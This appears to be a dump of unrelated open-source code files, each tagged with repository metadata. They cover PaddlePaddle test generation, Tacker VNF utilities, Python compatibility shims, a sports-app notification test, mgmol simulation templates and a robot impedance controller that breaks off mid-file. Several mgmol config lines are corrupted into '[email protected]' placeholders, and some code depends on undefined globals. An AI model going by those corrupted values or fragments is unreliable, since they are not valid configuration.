        saveModel(name, exe, feedkeys=['x'], fetchlist=[out], inputs=[x], outputs=[outs[0]], target_dir=sys.argv[1])

    return outs[0]


def main():
    x = np.linspace(1, 60, num = 60, dtype=np.int32).reshape(4, 3, 5).astype(data_type)
    slice("slice", x, axes=[1, 2], start=(0, 1), end=(-1, 3))

    x = np.linspace(1, 60, num = 60, dtype=np.int32).reshape(2, 30).astype(data_type)
    slice("slice_1d", x, axes=[0], start=[0], end=[1])

if __name__ == "__main__":
    main()
[((12, 4, 12, 24), 'paddle.enable_static', 'pdpd.enable_static', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((15, 17, 15, 77), 'paddle.static.data', 'pdpd.static.data', (), '', True, 'import paddle as pdpd\n'), ((16, 14, 16, 86), 'paddle.fluid.layers.slice', 'pdpd.fluid.layers.slice', (), '', True, 'import paddle as pdpd\n'), ((18, 14, 18, 39), 'paddle.static.cpu_places', 'pdpd.static.cpu_places', ({(18, 37, 18, 38): '1'}, {}), '(1)', True, 'import paddle as pdpd\n'), ((19, 14, 19, 42), 'paddle.static.Executor', 'pdpd.static.Executor', ({(19, 35, 19, 41): 'cpu[0]'}, {}), '(cpu[0])', True, 'import paddle as pdpd\n'), ((27, 8, 27, 116), 'save_model.saveModel', 'saveModel', (), '', False, 'from save_model import saveModel\n'), ((14, 35, 14, 56), 'paddle.static.Program', 'pdpd.static.Program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((14, 58, 14, 79), 'paddle.static.Program', 'pdpd.static.Program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((21, 16, 21, 53), 'paddle.static.default_startup_program', 'pdpd.static.default_startup_program', ({}, {}), '()', True, 'import paddle as pdpd\n'), ((32, 8, 32, 52), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n'), ((35, 8, 35, 52), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n')]
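For reference, the slice computed by the first generated model can be written directly in numpy; this is only an illustration of the axes/starts/ends semantics (negative ends count from the end of the axis), not part of the generator:

import numpy as np

x = np.linspace(1, 60, num=60, dtype=np.int32).reshape(4, 3, 5).astype('float32')
# axes=[1, 2], starts=(0, 1), ends=(-1, 3)  ->  x[:, 0:-1, 1:3], shape (4, 2, 2)
ref = x[:, 0:-1, 1:3]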
h1r0mu/tacker
tacker/sol_refactored/common/vnf_instance_utils.py
8c69dda51fcfe215c4878a86b82018d2b96e5561
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_log import log as logging

from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.sol_refactored import objects


LOG = logging.getLogger(__name__)  # not used at the moment


def get_inst(context, inst_id):
    inst = objects.VnfInstanceV2.get_by_id(context, inst_id)
    if inst is None:
        raise sol_ex.VnfInstanceNotFound(inst_id=inst_id)
    return inst


def get_inst_all(context):
    return objects.VnfInstanceV2.get_all(context)


def inst_href(inst_id, endpoint):
    return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id)


def make_inst_links(inst, endpoint):
    links = objects.VnfInstanceV2_Links()
    self_href = inst_href(inst.id, endpoint)
    links.self = objects.Link(href=self_href)
    if inst.instantiationState == 'NOT_INSTANTIATED':
        links.instantiate = objects.Link(href=self_href + "/instantiate")
    else:  # 'INSTANTIATED'
        links.terminate = objects.Link(href=self_href + "/terminate")
        # TODO(oda-g): add when the operation supported
        # links.scale = objects.Link(href = self_href + "/scale")
        # etc.

    return links


# see IETF RFC 7396
def json_merge_patch(target, patch):
    if isinstance(patch, dict):
        if not isinstance(target, dict):
            target = {}
        for key, value in patch.items():
            if value is None:
                if key in target:
                    del target[key]
            else:
                target[key] = json_merge_patch(target.get(key), value)
        return target
    else:
        return patch


def select_vim_info(vim_connection_info):
    # NOTE: It is assumed that vimConnectionInfo has only one item
    # at the moment. If there are multiple items, it is uncertain
    # which item is selected.
    for vim_info in vim_connection_info.values():
        return vim_info
[((23, 6, 23, 33), 'oslo_log.log.getLogger', 'logging.getLogger', ({(23, 24, 23, 32): '__name__'}, {}), '(__name__)', True, 'from oslo_log import log as logging\n'), ((27, 11, 27, 60), 'tacker.sol_refactored.objects.VnfInstanceV2.get_by_id', 'objects.VnfInstanceV2.get_by_id', ({(27, 43, 27, 50): 'context', (27, 52, 27, 59): 'inst_id'}, {}), '(context, inst_id)', False, 'from tacker.sol_refactored import objects\n'), ((34, 11, 34, 49), 'tacker.sol_refactored.objects.VnfInstanceV2.get_all', 'objects.VnfInstanceV2.get_all', ({(34, 41, 34, 48): 'context'}, {}), '(context)', False, 'from tacker.sol_refactored import objects\n'), ((42, 12, 42, 41), 'tacker.sol_refactored.objects.VnfInstanceV2_Links', 'objects.VnfInstanceV2_Links', ({}, {}), '()', False, 'from tacker.sol_refactored import objects\n'), ((44, 17, 44, 45), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n'), ((29, 14, 29, 57), 'tacker.sol_refactored.common.exceptions.VnfInstanceNotFound', 'sol_ex.VnfInstanceNotFound', (), '', True, 'from tacker.sol_refactored.common import exceptions as sol_ex\n'), ((46, 28, 46, 73), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n'), ((48, 26, 48, 69), 'tacker.sol_refactored.objects.Link', 'objects.Link', (), '', False, 'from tacker.sol_refactored import objects\n')]
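json_merge_patch above follows RFC 7396: a null value deletes the key, nested dicts merge recursively, and anything else replaces the target. A small illustration with made-up data:

target = {"name": "vnf-a", "meta": {"owner": "ops", "tier": 1}}
patch = {"meta": {"owner": None, "tier": 2}, "state": "INSTANTIATED"}
result = json_merge_patch(target, patch)
# -> {"name": "vnf-a", "meta": {"tier": 2}, "state": "INSTANTIATED"}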
cjw296/testfixtures
testfixtures/compat.py
1bf1e6fe1e111210d6d7fbcd00feb564095ffd02
# compatibility module for different python versions
import sys

if sys.version_info[:2] > (3, 0):

    PY2 = False
    PY3 = True

    Bytes = bytes
    Unicode = str
    basestring = str

    class_type_name = 'class'
    ClassType = type
    exception_module = 'builtins'
    new_class = type
    self_name = '__self__'
    from io import StringIO
    xrange = range

else:

    PY2 = True
    PY3 = False

    Bytes = str
    Unicode = unicode
    basestring = basestring

    class_type_name = 'type'
    from types import ClassType
    exception_module = 'exceptions'
    from new import classobj as new_class
    self_name = 'im_self'
    from cStringIO import StringIO
    xrange = xrange
[]
ofekashery/the-blue-alliance
old_py2/tests/models_tests/notifications/test_match_score.py
df0e47d054161fe742ac6198a6684247d0713279
import re import unittest2 from google.appengine.ext import ndb from google.appengine.ext import testbed from consts.notification_type import NotificationType from helpers.event.event_test_creator import EventTestCreator from models.team import Team from models.notifications.match_score import MatchScoreNotification class TestMatchScoreNotification(unittest2.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_datastore_v3_stub() self.testbed.init_memcache_stub() ndb.get_context().clear_cache() # Prevent data from leaking between tests self.testbed.init_taskqueue_stub(root_path=".") for team_number in range(6): Team(id="frc%s" % team_number, team_number=team_number).put() self.event = EventTestCreator.createPresentEvent() self.match = self.event.matches[0] self.notification = MatchScoreNotification(self.match) def tearDown(self): self.testbed.deactivate() def test_type(self): self.assertEqual(MatchScoreNotification._type(), NotificationType.MATCH_SCORE) def test_fcm_notification(self): self.assertIsNotNone(self.notification.fcm_notification) self.assertEqual(self.notification.fcm_notification.title, 'TESTPRESENT Q1 Results') match_regex = re.compile(r'^\d+, \d+, \d+ beat \d+, \d+, \d+ scoring \d+-\d+.$') match = re.match(match_regex, self.notification.fcm_notification.body) self.assertIsNotNone(match) def test_fcm_notification_tied(self): score = self.notification.match.alliances['red']['score'] self.notification.match.alliances['blue']['score'] = score self.assertIsNotNone(self.notification.fcm_notification) self.assertEqual(self.notification.fcm_notification.title, 'TESTPRESENT Q1 Results') match_regex = re.compile(r'^\d+, \d+, \d+ tied with \d+, \d+, \d+ scoring \d+-\d+.$') match = re.match(match_regex, self.notification.fcm_notification.body) self.assertIsNotNone(match) def test_fcm_notification_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) self.assertEqual(notification.fcm_notification.title, 'Team 1 TESTPRESENT Q1 Results') def test_data_payload(self): payload = self.notification.data_payload self.assertEqual(len(payload), 2) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['match_key'], '{}_qm1'.format(self.event.key_name)) def test_data_payload_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) payload = notification.data_payload self.assertEqual(len(payload), 3) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['match_key'], '{}_qm1'.format(self.event.key_name)) self.assertEqual(payload['team_key'], 'frc1') def test_webhook_message_data(self): # Has `event_name` payload = self.notification.webhook_message_data self.assertEqual(len(payload), 3) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['event_name'], 'Present Test Event') self.assertIsNotNone(payload['match']) def test_webhook_message_data_team(self): team = Team.get_by_id('frc1') notification = MatchScoreNotification(self.match, team) payload = notification.webhook_message_data self.assertEqual(len(payload), 4) self.assertEqual(payload['event_key'], self.event.key_name) self.assertEqual(payload['event_name'], 'Present Test Event') self.assertEqual(payload['team_key'], 'frc1') self.assertIsNotNone(payload['match'])
[((17, 23, 17, 40), 'google.appengine.ext.testbed.Testbed', 'testbed.Testbed', ({}, {}), '()', False, 'from google.appengine.ext import testbed\n'), ((29, 21, 29, 58), 'helpers.event.event_test_creator.EventTestCreator.createPresentEvent', 'EventTestCreator.createPresentEvent', ({}, {}), '()', False, 'from helpers.event.event_test_creator import EventTestCreator\n'), ((32, 28, 32, 62), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(32, 51, 32, 61): 'self.match'}, {}), '(self.match)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((43, 22, 43, 88), 're.compile', 're.compile', ({(43, 33, 43, 87): '"""^\\\\d+, \\\\d+, \\\\d+ beat \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$"""'}, {}), "('^\\\\d+, \\\\d+, \\\\d+ beat \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$')", False, 'import re\n'), ((44, 16, 44, 78), 're.match', 're.match', ({(44, 25, 44, 36): 'match_regex', (44, 38, 44, 77): 'self.notification.fcm_notification.body'}, {}), '(match_regex, self.notification.fcm_notification.body)', False, 'import re\n'), ((52, 22, 52, 93), 're.compile', 're.compile', ({(52, 33, 52, 92): '"""^\\\\d+, \\\\d+, \\\\d+ tied with \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$"""'}, {}), "('^\\\\d+, \\\\d+, \\\\d+ tied with \\\\d+, \\\\d+, \\\\d+ scoring \\\\d+-\\\\d+.$')", False, 'import re\n'), ((53, 16, 53, 78), 're.match', 're.match', ({(53, 25, 53, 36): 'match_regex', (53, 38, 53, 77): 'self.notification.fcm_notification.body'}, {}), '(match_regex, self.notification.fcm_notification.body)', False, 'import re\n'), ((57, 15, 57, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(57, 30, 57, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((58, 23, 58, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(58, 46, 58, 56): 'self.match', (58, 58, 58, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((68, 15, 68, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(68, 30, 68, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((69, 23, 69, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(69, 46, 69, 56): 'self.match', (69, 58, 69, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((85, 15, 85, 37), 'models.team.Team.get_by_id', 'Team.get_by_id', ({(85, 30, 85, 36): '"""frc1"""'}, {}), "('frc1')", False, 'from models.team import Team\n'), ((86, 23, 86, 63), 'models.notifications.match_score.MatchScoreNotification', 'MatchScoreNotification', ({(86, 46, 86, 56): 'self.match', (86, 58, 86, 62): 'team'}, {}), '(self.match, team)', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((38, 25, 38, 55), 'models.notifications.match_score.MatchScoreNotification._type', 'MatchScoreNotification._type', ({}, {}), '()', False, 'from models.notifications.match_score import MatchScoreNotification\n'), ((21, 8, 21, 25), 'google.appengine.ext.ndb.get_context', 'ndb.get_context', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((26, 12, 27, 41), 'models.team.Team', 'Team', (), '', False, 'from models.team import Team\n')]
jeanlucf22/mgmol
util/submission/templates.py
4e79bc32c14c8a47ae18ad0659ea740719c8b77f
md_template_d144 = """verbosity=0 xcFunctional=PBE FDtype=4th [Mesh] nx=160 ny=80 nz=80 [Domain] ox=0. oy=0. oz=0. lx=42.4813 ly=21.2406 lz=21.2406 [Potentials] pseudopotential=pseudo.D_tm_pbe [Poisson] solver=@ max_steps_initial=@50 max_steps=@50 reset=@ bcx=periodic bcy=periodic bcz=periodic [Run] type=MD [MD] type=@ num_steps=@ dt=@15. [XLBOMD] dissipation=@5 align=@ [Quench] max_steps=@5 max_steps_tight=@ atol=1.e-@10 num_lin_iterations=3 ortho_freq=100 [SpreadPenalty] type=@energy damping=@ [email protected] [email protected] [Orbitals] initial_type=Gaussian initial_width=1.5 overallocate_factor=@2. [ProjectedMatrices] solver=@short_sighted [LocalizationRegions] radius=@8. auxiliary_radius=@ [email protected] [Restart] input_filename=wave.out input_level=3 interval=@ """ md_template_H2O_64 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=128 ny=128 nz=128 [Domain] ox=0. oy=0. oz=0. lx=23.4884 ly=23.4884 lz=23.4884 [Potentials] pseudopotential=pseudo.O_ONCV_PBE_SG15 pseudopotential=pseudo.D_ONCV_PBE_SG15 [Poisson] solver=@ max_steps=@ [Run] type=MD [Quench] max_steps=1000 atol=1.e-@ [MD] type=@ num_steps=@ dt=10. print_interval=5 [XLBOMD] dissipation=@ align=@ [Restart] input_filename=wave.out input_level=4 output_level=4 interval=@ """ quench_template_H2O_64 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=128 ny=128 nz=128 [Domain] ox=0. oy=0. oz=0. lx=23.4884 ly=23.4884 lz=23.4884 [Potentials] pseudopotential=pseudo.O_ONCV_PBE_SG15 pseudopotential=pseudo.D_ONCV_PBE_SG15 [Run] type=QUENCH [Quench] max_steps=1000 atol=1.e-8 [Orbitals] initial_type=Fourier [Restart] output_level=4 """ quench_template_d144 = """verbosity=1 xcFunctional=PBE FDtype=4th [Mesh] nx=160 ny=80 nz=80 [Domain] ox=0. oy=0. oz=0. lx=42.4813 ly=21.2406 lz=21.2406 [Potentials] pseudopotential=pseudo.D_tm_pbe [Poisson] solver=@ max_steps_initial=@50 max_steps=@50 bcx=periodic bcy=periodic bcz=periodic [Run] type=QUENCH [Quench] max_steps=200 atol=1.e-7 num_lin_iterations=3 ortho_freq=100 [SpreadPenalty] type=@energy damping=@ [email protected] [email protected] [Orbitals] initial_type=Gaussian initial_width=1.5 [ProjectedMatrices] solver=@short_sighted [LocalizationRegions] radius=@8. 
[Restart] output_type=distributed """ H2O_64_params={ 'nodes': '32', 'ntasks': '256', 'omp_num_threads': 8 if omp_num_threads == 4 else omp_num_threads, 'cores_per_task': '2', 'potentials': 'ln -s $maindir/potentials/pseudo.O_ONCV_PBE_SG15\nln -s $maindir/potentials/pseudo.D_ONCV_PBE_SG15', 'lrs': '', 'jobname': 'H2O_64', } d144_params={ 'nodes': '8', 'walltime': '01:30:00', 'ntasks': '125', 'omp_num_threads': omp_num_threads, 'cores_per_task': '1', 'potentials': 'ln -s $maindir/potentials/pseudo.D_tm_pbe', 'lrs': '-l lrs.in', 'jobname': 'd144', } vulcan_params={ 'queue': 'psmall', 'scratch_path': '/p/lscratchv/mgmolu/dunn27/mgmol/', 'gres': 'lscratchv', 'exe': 'mgmol-bgq', } cab_params={ 'queue': 'pbatch', 'scratch_path': '/p/lscratchd/dunn27/mgmol/', 'gres': 'lscratchd', 'omp_num_threads': '1', 'exe': 'mgmol-pel', 'walltime': '01:30:00', } runfile_quench_template="""#!/bin/tcsh #MSUB -l nodes={nodes},walltime={walltime} #MSUB -o mgmol.out #MSUB -q {queue} #MSUB -A comp #MSUB -l gres={gres} #MSUB -N {jobname} rm -f queued echo ' ' > running use boost-nompi-1.55.0 export BOOST_ROOT=/usr/local/tools/boost-nompi-1.55.0 export Boost_NO_SYSTEM_PATHS=ON setenv OMP_NUM_THREADS {omp_num_threads} set ntasks = {ntasks} set maindir = $home/mgmol set exe = $maindir/bin/{exe} set datadir = `pwd` set scratchdir = {scratch_path}`basename $datadir` mkdir $scratchdir cd $scratchdir echo ' ' > running set cfg_quench = mgmol_quench.cfg cp $datadir/$cfg_quench . cp $datadir/coords.in . cp $datadir/lrs.in . {potentials} #1st run srun -n $ntasks -c {cores_per_task} $exe -c $cfg_quench -i coords.in {lrs} #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out rm -f running echo ' ' > queued """ runfile_md_template="""#!/bin/tcsh #MSUB -l nodes={nodes},walltime={walltime} #MSUB -o mgmol.out #MSUB -q {queue} #MSUB -A comp #MSUB -l gres={gres} #MSUB -N {jobname} rm -f queued echo ' ' > running use boost-nompi-1.55.0 export BOOST_ROOT=/usr/local/tools/boost-nompi-1.55.0 export Boost_NO_SYSTEM_PATHS=ON setenv OMP_NUM_THREADS {omp_num_threads} set ntasks = {ntasks} set maindir = $home/mgmol set exe = $maindir/bin/{exe} set datadir = `pwd` set scratchdir = {scratch_path}`basename $datadir` mkdir $scratchdir cd $scratchdir echo ' ' > running set cfg_md = mgmol_md.cfg cp $datadir/$cfg_md . #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out #MD run srun -n $ntasks -c {cores_per_task} $exe -c $cfg_md #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out rm -f running echo ' ' > queued """
[]
martihmy/Compliant_control
Compliant_control/Force Tracking/archive/VIC_Huang1992_(main 09.03).py
485f627fa83d59f414f41bd57c5d37528ef5f1ec
#! /usr/bin/env python import copy from copy import deepcopy import rospy import threading import quaternion import numpy as np from geometry_msgs.msg import Point from visualization_msgs.msg import * from franka_interface import ArmInterface from panda_robot import PandaArm import matplotlib.pyplot as plt from scipy.spatial.transform import Rotation np.set_printoptions(precision=2) """ This is a FORCE-BASED VARIABLE IMPEDANCE CONTROLLER based on [Huang1992: Compliant Motion Control of Robots by Using Variable Impedance] To achieve force tracking, the apparent stiffness (K) and damping (B) is dynamically adjusted through functions dependent on the error in position, velocity and force About the code/controller: 1] Only stiffness and damping in the 'z'-direction is adaptive, the rest are static 2] Due to the faulted joint velocities (read from rostopics), the more noisy, numerically derived derivatives of the joint position are prefered to be used in the controller { get_x_dot(..., numerically = True) } 3] You can now choose between perform_torque_Huang1992() and perform_torque_DeSchutter() - DeSchutter's control-law offers geometrically consitent stiffness and is more computationally expensive 4] The default desired motion- and force-trajectories are now made in a time-consistent matter, so that the PUBLISH RATE can be altered without messing up the desired behaviour. The number of iterations is calculated as a function of the controller's control-cycle, T: (max_num_it = duration(=15 s) / T) """ # --------- Constants ----------------------------- #print(robot.joint_ordered_angles()) #Read the robot's joint-angles #new_start = {'panda_joint1': 1.938963389436404, 'panda_joint2': 0.6757504724282993, 'panda_joint3': -0.43399745125475564, 'panda_joint4': -2.0375275954865573, 'panda_joint5': -0.05233040021194351, 'panda_joint6': 3.133254153457202, 'panda_joint7': 1.283328743909796} # Stiffness Kp = 30 Kpz = 30 #initial value (adaptive) Ko = 900 K = np.array([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]) # Damping Bp = Kp/7 Bpz = Bp # #initial value (adaptive) Bo = 50 B = np.array([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]) # Apparent inertia Mp = 10 Mo = 10 M_diag = np.array([Mp,Mp,Mp,Mo,Mo,Mo]) M = np.diagflat(M_diag) # Constant matrices appearing in equation (50) of [Huang1992] K_v = np.identity(6) P = np.identity(6) gamma = np.identity(18) #gamma_M = 12 gamma_B = 0.001 #2 # The damping's rate of adaptivity (high value = slow changes) gamma_K = 0.0005 #1 # The stiffness' rate of adaptivity (high value = slow changes) #gamma[2,2] = gamma_M gamma[8,8] = gamma_B gamma[14,14] = gamma_K duration = 15 #seconds SHOULD NOT BE ALTERED """Functions for generating desired MOTION trajectories""" #1 Generate a desired trajectory for the manipulator to follow def generate_desired_trajectory(iterations,T): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = np.zeros((3,iterations)) p[:,0] = get_p() if iterations > 300: a[2,0:100]=-0.00001/T**2 a[2,250:350]=0.00001/T**2 if iterations > 6500: a[0,4500:4510]=0.00001/T**2 a[0,6490:6500]=-0.00001/T**2 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p #2 Generate a desired trajectory for the manipulator to follow def generate_desired_trajectory_express(iterations,T): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = 
np.zeros((3,iterations)) p[:,0] = get_p() if iterations > 175: a[2,0:50]=-0.00002/T**2 a[2,125:175]=0.00002/T**2 if iterations > 3250: a[0,2250:2255]=0.00002/T**2 a[0,3245:3250]=-0.00002/T**2 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p #3 Generate a (time-consistent) desired motion trajectory def generate_desired_trajectory_tc(iterations,T,move_in_x=False): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = np.zeros((3,iterations)) p[:,0] = get_p() a[2,0:int(iterations/75)]=-1.25 a[2,int(iterations*2/75):int(iterations/25)]= 1.25 if move_in_x: a[0,int(iterations*3/5):int(iterations*451/750)]=1.25 a[0,int(iterations*649/750):int(iterations*13/15)]=-1.25 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p """Functions for generating desired FORCE trajectories""" #1 Generate a desired force trajectory def generate_F_d(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:100] = 0.0005/T**2 a[2,100:200] = - 0.0005/T**2 if max_num_it > 1100: a[2,500:550] = 0.0002/T**2 if max_num_it >4001: a[2,1500:1550]=-0.0002/T**2 it = 2000 while it <= 4000: a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,4001]=0.0001/T**2 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s #2 Generate an efficient desired force trajectory def generate_F_d_express(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:50] = 0.0010/T**2 a[2,100:150] = - 0.0010/T**2 if max_num_it > 275: a[2,250:275] = 0.0008/T**2 if max_num_it >2001: a[2,750:775]=-0.0008/T**2 it = 1000 while it <= 2000: a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,2001]=0.0001/T**2 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s #3 Generate a (time-consistent) desired force trajectory def generate_F_d_tc(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:int(max_num_it/75)] = 62.5 a[2,int(max_num_it/37.5):int(max_num_it/25)] = - 62.5 if max_num_it > 275: a[2,int(max_num_it/15):int(max_num_it*11/150)] = 50 if max_num_it >2001: a[2,int(max_num_it/5):int(max_num_it*31/150)]=-50 it = int(max_num_it*4/15) while it <= int(max_num_it*8/15): a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,int(max_num_it*8/15+1)]=6.25 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s # ------------ Helper functions -------------------------------- # Calculate the numerical derivative of a each row in a vector def get_derivative_of_vector(history,iteration,T): size = history.shape[0] if iteration > 0: return np.subtract(history[:,iteration],history[:,iteration-1])/T else: return np.zeros(size) # Saturation-function def ensure_limits(lower,upper,matrix): for i in range(6): if matrix[i,i] > upper: matrix[i,i] = upper elif matrix[i,i] < lower: matrix[i,i] = lower # Return the cartesian (task-space) inertia of the manipulator [alternatively the inverse of it] def get_W(inv = False): W = np.linalg.multi_dot([robot.jacobian(),np.linalg.inv(robot.joint_inertia_matrix()),robot.jacobian().T]) if inv == True: return np.linalg.inv(W) else: return W # Return the external forces (everything except for z-force is set to 0 due to offsets) def get_F_ext(two_dim = False): if 
two_dim == True: return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]).reshape([6,1]) else: return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]) # Return the position and (relative) orientation def get_x(goal_ori): pos_x = robot.endpoint_pose()['position'] rel_ori = quatdiff_in_euler_radians(goal_ori, np.asarray(robot.endpoint_pose()['orientation'])) return np.append(pos_x,rel_ori) # Return the linear and angular velocities # Numerically = True -> return the derivarive of the state-vector # Numerically = False -> read values from rostopic (faulty in sim when interacting with the environment) def get_x_dot(x_hist,i,T, numerically=False): if numerically == True: return get_derivative_of_vector(x_hist,i,T) else: return np.append(robot.endpoint_velocity()['linear'],robot.endpoint_velocity()['angular']) # Return the error in position and orientation def get_delta_x(goal_ori, p_d, two_dim = False): delta_pos = p_d - robot.endpoint_pose()['position'] delta_ori = quatdiff_in_euler_radians(np.asarray(robot.endpoint_pose()['orientation']), goal_ori) if two_dim == True: return np.array([np.append(delta_pos,delta_ori)]).reshape([6,1]) else: return np.append(delta_pos,delta_ori) # Return the error in linear and angular velocities def get_x_dot_delta(x_d_dot,x_dot, two_dim = True): if two_dim == True: return (x_d_dot - x_dot).reshape([6,1]) else: return x_d_dot - x_dot # Return the error in linear and angular acceleration def get_x_ddot_delta(x_d_ddot,v_history,i,T): a = get_derivative_of_vector(v_history,i,T) return x_d_ddot-a # Return the cartesian (task-space) position def get_p(two_dim=False): if two_dim == True: return robot.endpoint_pose()['position'].reshape([3,1]) else: return robot.endpoint_pose()['position'] # Compute difference between quaternions and return Euler angle in radians as difference def quatdiff_in_euler_radians(quat_curr, quat_des): curr_mat = quaternion.as_rotation_matrix(quat_curr) des_mat = quaternion.as_rotation_matrix(quat_des) rel_mat = des_mat.T.dot(curr_mat) rel_quat = quaternion.from_rotation_matrix(rel_mat) vec = quaternion.as_float_array(rel_quat)[1:] if rel_quat.w < 0.0: vec = -vec return -des_mat.dot(vec) # -------------- Main functions -------------------- # Get xi as it is described in equation (44) in [Huang1992] def get_xi(goal_ori, p_d, x_dot, x_d_dot, x_d_ddot, v_history, i, T): E = -get_delta_x(goal_ori, p_d) E_dot = -get_x_dot_delta(x_d_dot,x_dot, two_dim = False) E_ddot = -get_x_ddot_delta(x_d_ddot,v_history,i,T) E_diag = np.diagflat(E) E_dot_diag = np.diagflat(E_dot) E_ddot_diag = np.diagflat(E_ddot) return np.block([E_ddot_diag,E_dot_diag,E_diag]) # Calculate lambda_dot as in equation (50) in [Huang1992] def get_lambda_dot(gamma,xi,K_v,P,F_d): return np.linalg.multi_dot([-np.linalg.inv(gamma),xi.T,np.linalg.inv(K_v),P,get_F_ext(two_dim=True)-F_d.reshape([6,1])]) # Return the updated (adapted) Inertia, Damping and Stiffness matrices. 
